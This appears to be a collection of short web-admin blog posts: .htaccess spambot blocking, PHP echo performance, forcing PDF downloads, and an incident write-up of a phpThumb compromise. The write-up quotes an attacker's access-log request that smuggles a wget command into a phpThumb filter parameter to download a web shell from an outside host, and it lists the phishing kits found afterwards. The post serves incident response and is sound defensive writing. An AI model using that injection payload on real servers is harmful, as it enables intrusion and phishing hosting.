How to block spambots by user agent using .htaccess

http://healyourchurchwebsite.com/2008/05/27/how-to-block-spambots-by-user-agent-using-htaccess/

# redirect spambots & rogue spiders to the end of the internet
Options +FollowSymlinks
RewriteEngine On
RewriteBase /
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSearch [OR]
RewriteCond %{HTTP_USER_AGENT} ^Microsoft\ URL [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector
RewriteRule .* - [F,L]
Advertisements

Security Comprimised by PHPThumb Vulnerability – Solved

Today, i got an urgent message about a website, which actually got hacked due to an opensource PHP library for Image Modification operations ‘phpThumb’. phpThumb have published a security update end of last year (August 2011) but it was not updated on server.

Vulnerability is mentioned here …

http://secunia.com/advisories/39556

http://forum.intern0t.org/exploits-vulnerabilities-pocs/2969-phpthumb-all-versions-arbitrary-command-execution.html

The hacker footprint was …

I fetched all files changes in last 2 days … by going to public_html and running

# find ./ -type f -ctime -2 -exec ls -lcr {} \; > ../last-activity.txt

Interesting results … The Web Shell, Perl and PHP files …

-rw-r–r– 1 user user 24911 May 15 08:08 ./phpthumb/filess.php
-rw-r–r– 1 user user 4549 May 15 08:10 ./phpthumb/cp.txt
-rw-r–r– 1 user user 1076 May 15 08:13 ./phpthumb/confspy.log
-rw-r–r– 1 user user 24911 May 15 08:08 ./phpthumb/filess.php.1
-rw-r–r– 1 user user 194113 May 15 10:09 ./config.php

and The Phising Codes

-rw-r–r– 1 user user 28469 May 15 11:36 ./webmail.uncfsu.edu.zip
-rw-r–r– 1 user user 3669 May 15 11:37 ./webmail.uncfsu.edu/login_files/flogon.js
-rw-r–r– 1 user user 1144 May 15 11:37 ./webmail.uncfsu.edu/login_files/lgnexlogo.gif
-rw-r–r– 1 user user 2512 May 15 11:37 ./webmail.uncfsu.edu/login_files/lgntopr.gif
-rw-r–r– 1 user user 3461 May 15 11:37 ./webmail.uncfsu.edu/login_files/owafont.css
-rw-r–r– 1 user user 2310 May 15 11:37 ./webmail.uncfsu.edu/login_files/logon.css

…………………

-rw-r–r– 1 user user 222219 May 15 15:08 ./chaseupdating.zip
-rw-r–r– 1 user user 1245 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK.php
-rw-r–r– 1 user user 5692 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/Logon.php
-rw-r–r– 1 user user 316 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/index.php
-rw-r–r– 1 user user 29742 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/details.php
-rw-r–r– 1 user user 323 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/default_bg.gif
-rw-r–r– 1 user user 1556 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/search_button_home.gif
-rw-r–r– 1 user user 121 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/curvebg_darkblue_right.gif

Visiting Access Logs, explored exact details of the intruder actions …

41.138.185.64 – – [15/May/2012:08:08:51 -0600] “GET /vendors/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://41.138.185.64/filess.php;%20&phpThumbDebug=9 HTTP/1.1″ 200 48077 “-” “Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62”
41.138.185.64 – – [15/May/2012:08:08:58 -0600] “GET /vendors/phpthumb/filess.php HTTP/1.1” 200 471 “-” “Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62”
41.138.185.64 – – [15/May/2012:10:09:26 -0600] “GET /config.php HTTP/1.1” 302 378 “-” “Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62”

Looking Dangerous ?

…………………

Solution:

1.) Remove the infection from the files

2.) Ensure there as no php shells left behind

3.) Upgrade the software and keep upgrading.

http://www.webhostingtalk.com/showthread.php?t=972669

A must do thing is to keep an eye on http://secunia.com/advisories about vulnerabilities detected time by time.

I would suggest to make a gdocs file to track the all such cases. for e.g.

3rd party libs | installed version | released version | last check date.

Fix: PHP “echo()” function performance

Few days back, i was optimizing performance of a website. After all benchmark probes placed … i detected that the echo() statement is taking almost 1.6s just to print the $string variable of size around 100K. It sound very pathetic when all your DB fetching and other things are under 0.1s and echo() is taking 1.6s. It reminded me about the website phpsadness.com (that log the big issues of php) shared by my colleague (kadnan) few days back

Actual problem …

$t1 = microtime(true);
echo $html;
$t2 = microtime(true);
echo ($t2-$t1);

I researched on web, and found that it is a known issue with PHP’s Nagle’s Algorithm that is used in echo function.

I alternatively used print() but still it decreased to 1.1s but still not that i want.

A solution was proposed, to split the string in small pieces and then echo … it improved till 1s, but still not that i want.

http://www.php.net/manual/en/function.echo.php#52881

function echobig($string, $bufferSize = 8192) {
$splitString = str_split($string, $bufferSize);
foreach($splitString as $chunk) {
echo $chunk;
}
}

Promising Solution

i got this comment from a blog …
http://wonko.com/post/seeing_poor_performance_using_phps_echo_statement_heres_why#comment-5607

Guys, I think I narrowed it down even further!

As previously said, PHP buffering will let PHP race to the end of your script, but after than it will still “hang” while trying to pass all that data to Apache.

Now I was able, not only to measure this (see previous comment) but to actually eliminate the waiting period inside of PHP. I did that by increasing Apache’s SendBuffer with the SendBufferSize directive.

This pushes the data out of PHP faster. I guess the next step would be to get it out of Apache faster but I’m not sure if there is actually another configurable layer between Apache and the raw network bandwidth.

– Francois Planque

This seems very promising, as peoples commented … and i’ll be going to try it very soon.

Reference:
http://wonko.com/post/seeing_poor_performance_using_phps_echo_statement_heres_why
http://phplens.com/lens/php-book/optimizing-debugging-php.php
http://www.php.net/manual/en/function.echo.php#52881

Force Download PDF using Lighttpd

In lighttpd, to disabled PDF opening in browser, add following config files at lighttpd.conf. This is useful in increasing CTR as browsers usually get stucked while loading PDF files.


$HTTP["url"] =~ "(.*)\.pdf" {
mimetype.assign = (".pdf" =>"application/octet-stream")
setenv.add-response-header = ( "Content-Disposition" => "attachment" )
}

+ Dont forget to enable setenv module, if not already done …
server.modules += ( "mod_setenv" )

This is lighttpd version of my previous thread using apache.

Sources:

http://symkat.com/tag/content-disposition/
http://www.cyberciti.biz/faq/mod_setenv-lighttpd-send-custom-headers/

$_GET size limitations

I was searching for send some parameters using query string … so i come to know few things …

1. There is a limitation of 256 char (max) on client’s browser.
2. But if you use CURL or fopen to pass querystring data, On apache server, limit can be controlled by param ‘limitrequestfieldsize

You can limit the size of allowed data also by the server.

See http://httpd.apache.org/docs/2.2/en/…questfieldsize
The default configuration in Apache HTTP-Server allows only 4094 bytes.

Ref: http://bytes.com/topic/php/answers/658657-_get-parameter-size-limit

Online GZip Testing Tools

Sharing some online gzip testing tools for knowing if gzip is enabled on server or not.

1. http://gziptest.com/

2. http://www.gidnetwork.com/tools/gzip-test.php

3. http://nontroppo.org/tools/gziptest/ (browser based testing)

Force a PDF or MP3 to download (without loading in memory)

Just add this line in .htaccess file, and it’ll force PDF file to download rather than opening it on adobe reader.

<FilesMatch “.(?i:(pdf|mp3))$”>
<IfModule mod_headers.c>
ForceType application/octet-stream
Header set Content-Disposition attachment
</IfModule>
</FilesMatch>

Here are the helpful links …

1. http://www.thingy-ma-jig.co.uk/blog/06-08-2007/force-a-pdf-to-download
2. http://www.askapache.com/htaccess/using-http-headers-with-htaccess.html

For Lighttpd … follow this link